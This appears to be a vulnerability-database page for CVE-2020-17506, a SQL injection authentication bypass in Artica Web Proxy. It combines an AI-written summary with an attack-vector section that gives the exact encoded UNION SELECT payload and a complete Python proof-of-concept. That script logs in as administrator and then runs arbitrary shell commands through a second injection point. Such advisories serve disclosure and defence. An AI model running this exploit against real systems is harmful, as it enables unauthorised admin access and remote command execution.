CVE-2020-17506
Description
Artica Web Proxy 4.30.00000000 allows SQL injection in apikey parameter to bypass authentication and gain admin privileges.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Artica Web Proxy 4.30.00000000 allows SQL injection in apikey parameter to bypass authentication and gain admin privileges.
Vulnerability
Artica Web Proxy version 4.30.00000000 contains a SQL injection vulnerability in the apikey parameter of fw.login.php. This allows an unauthenticated remote attacker to manipulate SQL queries and bypass privilege checks, ultimately achieving administrator-level access to the web backend. The affected version is explicitly 4.30.00000000 [1][2].
Exploitation
An attacker can exploit this by sending a crafted HTTP request to the fw.login.php endpoint with a malicious apikey parameter. No authentication is required, and the attack can be performed remotely over the network. The SQL injection allows the attacker to inject arbitrary SQL commands, leading to authentication bypass [1].
Impact
Successful exploitation grants the attacker full administrative privileges on the Artica Proxy web interface. This compromises the confidentiality, integrity, and availability of the proxy system, allowing the attacker to read sensitive data, modify configurations, or potentially execute further commands [1][2].
Mitigation
As of the publication date (August 12, 2020), no official patch or fixed version has been disclosed in the available references. Users are advised to monitor vendor updates and consider restricting network access to the administrative interface as a temporary workaround. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Artica/Web Proxydescription
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The application is vulnerable to SQL injection via the apikey parameter in fw.login.php, allowing privilege escalation."
Attack vector
A remote attacker can send a crafted request to the `fw.login.php` endpoint with a malicious `apikey` parameter. This parameter contains a SQL UNION SELECT statement that manipulates the query to bypass privilege checks. The payload `'%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;'` is used to inject SQL code, effectively granting the attacker administrator privileges [ref_id=1].
Affected code
The vulnerability exists in the `fw.login.php` file, specifically related to the handling of the `apikey` parameter. The provided exploit code targets this endpoint to inject SQL commands [ref_id=1].
What the fix does
The advisory does not specify a patch or provide details on how the vulnerability is fixed. Remediation guidance suggests updating to a secure version, but specific code changes are not detailed.
Preconditions
- networkThe target must be accessible over the network.
- inputThe attacker must be able to send a crafted HTTP request with a malicious `apikey` parameter.
Reproduction
```python import requests import argparse from bs4 import BeautifulSoup
def bypass_auth(session, args): login_endpoint = "/fw.login.php?apikey=" payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
print("[+] Bypassing authentication...") session.get(args.host + login_endpoint + payload, verify=False)
return session
def run_command(session, args): cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command) print("[+] Running command: {}".format(args.command)) response = session.post(args.host + cmd_endpoint, verify=False) soup = BeautifulSoup(response.text, "html.parser") print(soup.find_all("code")[1].get_text())
def main(): parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.") parser.add_argument( "--host", help="The host to target. Format example: https://host:port", ) parser.add_argument("--command", help="The command to run")
args = parser.parse_args() if not args.host or not args.command: parser.print_help() exit(0) session = requests.Session() session = bypass_auth(session, args)
run_command(session, args)
if __name__ == "__main__": main() ```
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.htmlmitrex_refsource_MISC
- packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.htmlmitrex_refsource_MISC
- blog.max0x4141.com/post/artica_proxy/mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.